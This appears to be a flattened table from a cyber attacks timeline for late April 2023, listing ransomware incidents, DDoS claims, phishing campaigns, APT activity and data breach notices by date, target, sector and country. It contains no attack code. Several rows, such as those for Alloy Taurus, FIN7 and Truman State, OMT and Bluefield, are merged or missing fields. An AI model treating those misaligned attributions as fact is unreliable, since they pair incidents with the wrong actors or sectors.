A threat actor dubbed Sharpboys leaks tens of thousands of records from Israel ATID group.
Unknown
Education
Hacktivism
IL
ATID Group, Academy for Torah Initiatives and Directions, Sharpboys ATID
107
24/04/2023
Early April 2023
Early April 2023
Gh0st RAT
Undisclosed healthcare organization
Researchers from Cofense reveal that Gh0st RAT, a decades-old open-source remote administration tool (RAT), recently appeared in phishing campaigns targeting a healthcare organization
Account Takeover
Human health and social work
Cyber Espionage
N/A
Cofense, Gh0st RAT
108
24/04/2023
'Recently'
'Recently'
?
CIC Group
CIC Group files a notice of data breach after learning that confidential consumer information that had been entrusted to the company was subject to unauthorized access.
Unknown
Other service activities
Cyber Crime
US
CIC Group
109
24/04/2023
-
-
?
Livingston International
Livingston International files a notice of data breach determining that confidential consumer information that had been entrusted to the company was subject to unauthorized access.
Unknown
Professional, scientific and technical
Cyber Crime
US
Livingston International
110
24/04/2023
-
-
?
Elk Grove Unified School District
The Elk Grove Unified School District confirms it is investigating tax filing issues for some of its employees.
Unknown
Education
Cyber Crime
US
Elk Grove Unified School District
111
24/04/2023
24/04/2023
24/04/2023
?
UniSat Wallet
UniSat Wallet experiences a large number of double-spend attacks due to a vulnerability in the codebase.
Vulnerability
Fintech
Cyber Crime
N/A
UniSat Wallet
112
24/04/2023
-
-
?
Fullerton India
The LockBit ransomware claims to have hit Indian non-bank lender Fullerton India and threatens to dump more than 600 gigabytes of financial data unless it receives a $3 million extortion payment.
Malware
Finance and insurance
Cyber Crime
IN
Fullerton India, ransomware, LockBit
113
25/04/2023
-
-
LOBSHOT
Multiple organizations
Researchers from Elastic discover a new malware known as ‘LOBSHOT’ distributed using Google ads, and allowing threat actors to stealthily take over infected Windows devices using hVNC.
Malware
Multiple Industries
Cyber Crime
>1
Elastic, LOBSHOT, Google ads, hVNC
114
25/04/2023
24/04/2023
24/04/2023
Play
City of Lowell
The City of Lowell announces to have been hit by a ransomware attack. The Play ransomware gang claims responsibility for the attack.
Malware
Public admin and defence, social security
Cyber Crime
US
City of Lowell, Play, ransomware
115
25/04/2023
Since February 2023
Between February and March 2023
?
Facebook users
Researchers from Group-IB discover a new and still ongoing phishing scheme aimed at Facebook users that sees threat actors attempt to steal account credentials and take over profiles, carried out via 3,200 fake profiles.
Account Takeover
Individual
Cyber Crime
>1
Group-IB, Facebook, Meta
116
25/04/2023
-
-
Educated Manticore
Individuals in Israel
Researchers from Check Point reveal the details of Educated Manticore, a new Iranian-aligned threat actor targeting individuals in Israel with new tactics and tools, including a new version of PowerLess, an implant previously attributed to the Phosphorous threat actor.
Targeted Attack
Individual
Cyber Espionage
IL
Check Point, Educated Manticore, PowerLess, Phosphorous
117
25/04/2023
From December 2022 through March 2023
-
FIN6
Organizations in the financial sector
Researchers from Securonix discover a new attack campaign dubbed OCX#HARVESTER distributing the More_eggs backdoor, along with other malicious payloads.
Malware
Finance and insurance
Cyber Crime
>1
FIN6, OCX#HARVESTER, More_eggs
118
25/04/2023
-
-
?
Multiple organizations in Italy
Researchers from Malwarebytes discover a new campaign distributing GuLoader via a fake shipment notification email delivering a malicious ISO file.
Malware
Multiple Industries
Cyber Crime
IT
Malwarebytes, GuLoader
119
25/04/2023
-
-
?
Unknown organization in China
Unknown threat actors post a massive data set on a Russian forum, allegedly offering the opportunity to buy sensitive details of over 630 million users from China.
Unknown
Unknown
Cyber Crime
CN
China
120
25/04/2023
15/02/2023
03/03/2023
?
StaffScapes
StaffScapes, a Colorado-based human resources services company, discloses that an unauthorized party gained access to its environments following an e-mail compromise.
Account Takeover
Professional, scientific and technical
Cyber Crime
US
StaffScapes
121
25/04/2023
-
-
?
Multimedica
Multimedica is hit with a ransomware attack and several hospitals in Italy cannot provide services to their patients.
Malware
Professional, scientific and technical
Cyber Crime
IT
Multimedica, ransomware
122
26/04/2023
26/04/2023
26/04/2023
Anonymous Sudan
Official personal website of Israel's Prime Minister Benjamin Netanyahu
The official personal website of Israel's Prime Minister Benjamin Netanyahu is briefly taken down by a DDoS attack.
DDoS
Individual
Hacktivism
IL
Anonymous Sudan, Benjamin Netanyahu
123
26/04/2023
26/04/2023
26/04/2023
Anonymous Sudan
Multiple targets in Israel including the websites of Haifa Port and the Israel Ports Development company
Anonymous Sudan is thought to be behind other attacks against multiple Israeli targets.
DDoS
Transportation and storage
Hacktivism
IL
Anonymous Sudan, Haifa Port, Israel Ports Development
124
26/04/2023
26/04/2023
26/04/2023
Anonymous Sudan
National Insurance Institute
Anonymous Sudan claims to have taken down the Israel National Insurance Institute.
DDoS
Public admin and defence, social security
Hacktivism
IL
Anonymous Sudan, Israel National Insurance Institute
125
26/04/2023
26/04/2023
26/04/2023
Anonymous Sudan
Israel's spy agency Mossad
Anonymous Sudan claims to have taken down Israel's spy agency Mossad.
DDoS
Public admin and defence, social security
Hacktivism
IL
Anonymous Sudan, Mossad
126
26/04/2023
26/04/2023
26/04/2023
Anonymous Sudan
Maariv
Anonymous Sudan takes down the websites of major Israeli news outlet Maariv.
DDoS
Information and communication
Hacktivism
IL
Anonymous Sudan, Maariv
127
26/04/2023
'Recently'
'Recently'
Alloy Taurus (aka GALLIUM, Softcell)
Organizations in South Africa and Nepal.
Researchers from Palo Alto Networks reveal that the Chinese threat actors from Alloy Taurus are deploying new Linux malware variants in cyber espionage attacks, such as a new PingPull variant and a previously undocumented backdoor tracked as 'Sword2033.'
Researchers from ESET uncover a campaign by the APT group known as Evasive Panda targeting an International NGO in China with malware delivered through updates of the popular Tencent QQ Chinese software.
Researchers from Trellix and Cyble discover a new macOS information-stealing malware named 'Atomic' (aka 'AMOS') sold to cybercriminals via private Telegram channels for a subscription of $1,000 per month.
Malware
Multiple Industries
Cyber Crime
>1
Trellix, Cyble, Atomic, AMOS, Telegram
130
26/04/2023
-
-
Read The Manual (RTM) Locker
Multiple organizations
Researchers from Uptycs discover a Linux variant of the RTM Locker ransomware targeting ESXi servers and based on the leaked source code of the now-defunct Babuk ransomware.
Malware
Multiple Industries
Cyber Crime
>1
Read The Manual, RTM) Locker, Linux, Babuk, ransomware, ESXi
131
26/04/2023
-
-
?
Android users
Researchers from McAfee discover a set of 38 Minecraft copycat games on Google Play infected devices with the Android adware 'HiddenAds', downloaded by roughly 35 million Android users and able to stealthily load ads in the background to generate revenue for its operators.
Malware
Individual
Cyber Crime
CA
BR
KR
US
McAfee, Google Play, Android, HiddenAds
132
26/04/2023
Since at least 28/03/2023
28/03/2023
FIN7
Vulnerable Veeam backup servers
Researchers from WithSecure reveal discover a campaign by the FIN7 criminal group exploiting the Veeam backup CVE-2023-27532 vulnerability to install the DiceLoader/Lizar backdoor.
Truman State University in Kirksville, Missouri says it is in the process of recovering from a “cybersecurity virus attack” that forced it to shut down the campus network and order all school-issued devices to be turned off.
Unknown
Education
Cyber Crime
US
Truman State University
134
26/04/2023
'Recently'
'Recently'
APT35 AKA Mint Sandstorm or Charming Kitten
Organizations in the U.S., Europe, India, Turkey and other countries
Researchers from Bitdefender reveal that the Iranian state-sponsored hacking group has been accused of deploying a new strain of malware named BellaCiao against several victims in the U.S., Europe, India, Turkey and other countries.
Targeted Attack
Multiple Industries
Cyber Espionage
US
IN
TR
APT35, Mint Sandstorm, Charming Kitten, Bella Ciao, Bitdefender
135
26/04/2023
-
-
LockBit 3.0
Keystone SMILES Community Learning Center
The LockBit ransomware gang apologizes for breaching Keystone SMILES Community Learning Center, nonprofit preschool organization.
Malware
Human health and social work
Cyber Crime
US
LockBit, LockBit 3.0, Keystone SMILES Community Learning Center
136
26/04/2023
Since at least early April 2023
During early April 2023
?
AT&T users
Unknown hackers are breaking into the accounts of people who have AT&T email addresses, and using that access to then hack into the victim’s cryptocurrency exchange’s accounts and steal their crypto
Account Takeover
Fintech
Cyber Crime
US
AT&T
137
26/04/2023
Since at least January 2023
Since at least January 2023
Vietnamese threat actors
Facebook users in USA, Canada, England and Australia
Researchers from Guardio Labs discover a ‘malverposting’ campaign linked to a Vietnamese threat actor ongoing for months and estimated to have infected over 500,000 devices worldwide in the past three months alone.
Malverposting
Individual
Cyber Crime
AU
CA
UK
US
Guardio Labs, Facebook, Vietnam
138
26/04/2023
26/04/2023
26/04/2023
?
Facebook account of Israel's Prime Minister Benjamin Netanyahu
The Facebook account of Israel's Prime Minister is hijacked (albeit briefly) by unauthorised parties who manage to update it with a video of prayers at a mosque, accompanied by Arabic verses from the Quran.
Account Takeover
Individual
Hacktivism
IL
Facebook. Quran, Benjamin Netanyahu
139
26/04/2023
26/04/2023
26/04/2023
Anonymous Sudan
Multiple websites in Israel
Anonymous Sudan claims to have taken down multiple websites in Israel, including the official government website of Israel, the Israeli Police, the Israel Broadcasting Corporation, at least seven financial institutions, five healthcare facilities, four universities, nine utilities and telecommunications companies, three Israeli airlines, and one airport.
DDoS
Multiple Industries
Hacktivism
IL
Anonymous Sudan
140
26/04/2023
During April 2023
During April 2023
Tonto Team
Korean education, construction, diplomatic, and political institutions
Researchers from AhnLab discover a new campaign carried out by the Chinese Tonto Team thret actor using a file related to anti-malware products to execute their malicious attacks.
Targeted Attack
Multiple Industries
Cyber Espionage
KR
Tonto Team, China, AhnLab
141
26/04/2023
26/04/2023
26/04/2023
?
Merlin
Decentralized crypto exchange Merlin suffers a nearly $2 million rug pull.
Rug Pull
Fintech
Cyber Crime
N/A
Merlin
142
26/04/2023
19/07/2022
19/07/2022
?
NYSARC Columbia County Chapter (COARC)
NYSARC Columbia County Chapter (COARC) confirms that they experienced a ransomware attack in July 2022.
Malware
Human health and social work
Cyber Crime
US
NYSARC Columbia County Chapter, COARC, ransomware
143
26/04/2023
During September 2022
23/03/2023
?
Astral Brands
Astral Brands, a beauty product company is breached in a cyberattack, exposing the financial data of hundreds of customers.
Unknown
Wholesale and retail
Cyber Crime
US
Astral Brands
144
26/04/2023
-
-
Undisclosed Ukrainian man
Individuals in Eastern Europe
The Cyber Police of Ukraine arrests a man for selling the personal data of more than 300 million individuals stolen via closed groups and channels in Telegram. Stolen information includes Ukrainian and European passport, taxpayer and driver's license numbers, as well as bank account data and birth certificates
Account Takeover
Individual
Cyber Crime
>1
Ukraine
145
27/04/2023
-
-
?
Online stores
Researchers from Malwarebytes discover that MageCart skimmers are now hijacking legitimate online store's payment pages to show their own fake payment forms as modals to steal customers' credit cards.
Malicious Script Injection
Wholesale and retail
Cyber Crime
>1
Malwarebytes, MageCart
146
27/04/2023
Since 2020
Since 2020
Iranian Government
Minority groups in Iran
Researchers from Lookout discover BouldSpy, an Android spyware used by the Iranian government to surveil minority groups in the country and monitor arms, alcohol, and drugs trafficking.
Malware
Individual
Cyber Espionage
IR
BouldSpy, Lookout, Android
147
27/04/2023
-
-
?
CityJerks[.]com
Attackers steal mail addresses, direct messages, and other personal data from users of CityJerks[.]com, a dating website.
Unknown
Arts entertainment, recreation
Cyber Crime
US
CityJerks[.]com
148
27/04/2023
-
-
?
CityJerks[.]com
Attackers steal mail addresses, direct messages, and other personal data from users of TruckerSucker[.]com, a dating website.
Unknown
Arts entertainment, recreation
Cyber Crime
US
TruckerSucker[.]com
149
27/04/2023
-
-
?
Hardenhuish School
Hardenhuish School, a secondary school in the UK, confirms it has been the victim of a ransomware attack which has affected its IT network.
Malware
Education
Cyber Crime
UK
Hardenhuish School, ransomware
150
27/04/2023
-
-
?
Russian Foreign Military Intelligence Agency (GRU), Foreign Intelligence Service (SVR), and Federal Security Service (FSB)
In name of OP_RETURN; a mysterious bitcoiner exposes 986 wallets controlled by the Foreign Military Intelligence Agency (GRU), Foreign Intelligence Service (SVR), and Federal Security Service (FSB) and transfers the stolen bitcoins to addresses associated with Ukrainian volunteers.
Vulnerability
Professional, scientific and technical
Hacktivism
RU
OP_RETURN, Foreign Military Intelligence Agency, GRU, Foreign Intelligence Service, SVR, Federal Security Service, FSB, Russia, Ukraine
151
27/04/2023
-
-
Avos Locker
Emmanuel College
Emmanuel College in Boston appears to have become a victim of Avos Locker ransomware. The college is added to the threat actor’s leak site yesterday, with the attacker claiming to have exfiltrated 140. gb of data.
Malware
Education
Cyber Crime
US
Emmanuel College, ransomware, Avos Locker
152
27/04/2023
13/03/2023
-
RansomHouse
OMT Officine Meccaniche Torino
OMT Officine Meccaniche Torino suffers a RansomHouse ransomware attack and has 200GB of data leaked.
The local region of Friuli Venezia Giulia in Italy suffers a cyber attack.
Unknown
Public admin and defence, social security
Cyber Crime
IT
Regione Friuli Venezia Giulia
154
28/04/2023
-
-
APT28 AKA Fancy Bear
Various government bodies in Ukraine
The Computer Emergency Response Team of Ukraine (CERT-UA) reveals that Russian threat actors from APT28 are targeting various government bodies in the country with malicious emails supposedly containing instructions on how to update Windows as a defense against cyber attacks.
Targeted Attack
Public admin and defence, social security
Cyber Espionage
UA
Computer Emergency Response Team of Ukraine, CERT-UA, APT28
155
28/04/2023
25/04/2023
25/04/2023
?
Americold
Americold, a leading U.S cold storage and logistics company, faces IT issues after its network was breached.
Unknown
Administration and support service
Cyber Crime
US
Americold
156
28/04/2023
Between February and March 2023
During March 2023
?
T-Mobile
T-Mobile discloses the second data breach of 2023 after discovering that attackers had access to the personal information of 836 customers for more than a month, starting late February 2023.
Unknown
Information and communication
Cyber Crime
US
T-Mobile
157
28/04/2023
-
-
Medusa
Alto Calore Servizi
Alto Calore Servizi, an Italian company that provides drinking water to nearly half a million people is experiencing some technical disruptions following a ransomware attack.
Malware
Water supply, waste mgmt, remediation
Cyber Crime
IT
Alto Calore Servizi, Medusa, Ransomware
158
28/04/2023
-
-
?
National Smallbore Rifle Association (NSRA)
The National Smallbore Rifle Association (NSRA) confirms that it has been the victim of a cyber-attack.
Unknown
Other service activities
Cyber Crime
UK
National Smallbore Rifle Association, NSRA
159
28/04/2023
Since 2022
'Recently'
AresLoader
Multiple organizations using Citrix
Researchers from Cyble discover a new loader called AresLoader that has been used to spread several types of malware families.
Malware
Multiple Industries
Cyber Crime
>1
Cyble, AresLoader
160
28/04/2023
During March and April 2023
During March and April 2023
Rapture
Multiple organizations
Researchers from Trend Micro discover a new ransomware strain, dubbed Rapture, showing similarities with the Paradise ransomware.
Malware
Multiple Industries
Cyber Crime
>1
Trend Micro, ransomware, Rapture, Paradise
161
28/04/2023
Since at least 28/04/2023
28/04/2023
?
Romanian telecom customers
Researchers from Heimdal discover an active phishing campaign that appears to specifically target Romanian telecom customers.
Account Takeover
Individual
Cyber Crime
RO
Heimdal
162
28/04/2023
12/03/2023
12/03/2023
?
Diocese of Las Vegas
The Diocese of Las Vegas announces a cybersecurity breach that potentially compromised "sensitive information of its volunteers, parishioners, donors and other stakeholders."
Unknown
Other service activities
Cyber Crime
US
Diocese of Las Vegas
163
28/04/2023
-
-
?
Multiple organizations
Researchers from Trend Micro discover an infostealer mimicking a ChatGPT Windows desktop client that’s capable of copying saved credentials from the Google Chrome login data folder.
Malware
Multiple Industries
Cyber Crime
>1
Trend Micro, ChatGPT
164
28/04/2023
28/04/2023
28/04/2023
?
0VIX
Decentralized-finance protocol 0VIX loses roughly $2 million in a flash-loan exploit.
Flash Loan
Fintech
Cyber Crime
N/A
0VIX
165
28/04/2023
Between 29/03/2023 and 14/04/2023
30/03/2023
ALPHV AKA BlackCat
NextGen Healthcare
NextGen Healthcare, a U.S.-based provider of electronic health record software, admits that hackers breached its systems and stole the personal data of 1.05 million patients.
Malware
Professional, scientific and technical
Cyber Crime
US
NextGen Healthcare, ransomware, ALPHV, BlackCat
166
28/04/2023
-
23/06/2022
?
HealthPlan Services
HealthPlan Services files a notice of data breach after learning that a recent malware attack subjected confidential consumer information in the company’s possession to unauthorized access.
Malware
Professional, scientific and technical
Cyber Crime
US
HealthPlan Services
167
28/04/2023
'Recently'
'Recently'
?
Berlin Packaging
Berlin Packaging files a notice of data breach after discovering that a recent cyberattack compromised confidential human resources information stored on the company’s computer network.
Unknown
Manufacturing
Cyber Crime
US
Berlin Packaging
168
28/04/2023
20/04/2023
20/04/2023
Royal
Montana State University
Montana State University posts a notice informing students and employees of a system outage. The Royal ransomware group claims responsibility for the attack.
Malware
Education
Cyber Crime
US
Montana State University, Royal, ransomware
169
28/04/2023
Between 28/11/2022 and 06/12/2022
04/12/2022
?
Pinnacle Propane
Pinnacle Propane files a notice of data breach after confirming that consumer data within the company’s possession was leaked as a result of a recent cyberattack.
Unknown
Electricity, gas steam, air conditioning
Cyber Crime
US
Pinnacle Propane
170
28/04/2023
Between 19/02/2023 and 25/02/2023
-
?
United Healthcare (UHC)
UnitedHealthcare (UHC) reports a data breach after the organization identified suspicious activity on the UHC mobile application.
Credential Stuffing
Human health and social work
Cyber Crime
US
United Healthcare, UHC
171
28/04/2023
Since at least 13/04/2023
Since at least 13/04/2023
Cl0p and LockBit
Healthcare organizations in the U.S.
The Health Sector Cybersecurity Coordination Center (HC3) issues a sector alert about the current operations of Clop and LockBit ransomware groups, which have recently been leveraging three known PaperCut vulnerabilities (CVE-2023-27351, CVE-2023-27350, and CVE-2023-0669) to target healthcare organizations.
CVE-2023-27351, CVE-2023-27350, and CVE-2023-0669 vulnerabilities
Human health and social work
Cyber Crime
US
Health Sector Cybersecurity Coordination Center, HC3, Cl0p, LockBit, ransomware, PaperCut, CVE-2023-27351, CVE-2023-27350, CVE-2023-0669
172
28/04/2023
During March 2023
-
?
Aetonix Systems
Health and personal information of up to 100,000 patients at Queensway Carleton Hospital are affected by a major data breach involving Aetonix Systems, an Ottawa-based third-party software provider.
Unknown
Professional, scientific and technical
Cyber Crime
CA
Queensway Carleton Hospital, Aetonix Systems
173
29/04/2023
-
-
Sandworm AKA FROZENBARENTS
Ukrainian state networks
The Computer Emergency Response Team of Ukraine (CERT-UA) reveals that the Russian 'Sandworm' hacking group has been linked to an attack on Ukrainian state networks where WinRar was used to destroy data on government devices.
Malware
Public admin and defence, social security
Cyber Warfare
UA
Sandworm, FROZENBARENTS, Computer Emergency Response Team of Ukraine, CERT-UA, Sandworm, WinRar
174
29/04/2023
-
28/04/2023
?
Orqa
Orqa, a maker of First Person View (FPV) drone racing goggles, claims that a contractor introduced code into its devices' firmware that acted as a time bomb designed to brick them.
Malware
Manufacturing
Cyber Crime
HR
Orqa
175
29/04/2023
-
-
?
County of Spartanburg
The South Carolina county of Spartanburg is dealing with a ransomware attack that has limited its IT and phone systems.
Malware
Public admin and defence, social security
Cyber Crime
US
South Carolina, County of Spartanburg, ransomware
176
29/04/2023
-
-
LockBit 3.0
Relentless Church
The notorious LockBit ransomware group adds South Carolina-based Relentless Church to its list of victims, claiming to have stolen employee data ranging from passports to financial documents.
Malware
Other service activities
Cyber Crime
US
LockBit 3.0, LockBit, ransomware, Relentless Church
177
30/04/2023
30/04/2023
30/04/2023
Avos Locker
Bluefield University
The Bluefield University is hit with an Avos ransomware attack. Few days later the ransomware gang hijacks the University's emergency broadcast system, "RamAlert," to send students and staff SMS texts and email alerts that their data was stolen and would soon be released.
Bitmarck, one of the largest IT service providers within Germany’s statutory health insurance system, announces to have taken all of its customer and internal systems offline due to a cyberattack.
Unknown
Professional, scientific and technical
Cyber Crime
DE
Bitmarck
179
30/04/2023
-
-
?
Nashua School District
The Nashua School District discloses that it was hit by a "sophisticated" cyberattack
Unknown
Education
Cyber Crime
US
Nashua School District
180
30/04/2023
-
-
Karakurt
Our Sunday Visitor
Data extortion group Karakurt claims it attacked Our Sunday Visitor, a Catholic publishing company, The attackers claim to have stolen 130 gigabytes of data, including accounting documents, HR information, employee data, financial contracts, invoices, marketing information and more.
Malware
Information and communication
Cyber Crime
US
Karakurt, Our Sunday Visitor, ransomware
ID
Date Reported
Date Occurred
Date Discovered
Author
Target
Description
Attack
Target Class
Attack Class
Country
Link
Tags
SUPPORT MY WORK! MAKE A DONATION
Creating the timelines is a very time-consuming task.
Any little helps!
BREACHOMETER
No Data Found
The “Breachometer” compares the current number of events/day with the max and min values recorded in the previous 12 months.
April 2023 Cyber Attacks Timeline
The Biggest Data Breaches of 2023
16-30 April 2023 Cyber Attacks Timeline
Q1 2023 Cyber Attacks Statistics
Leaky Buckets in 2023
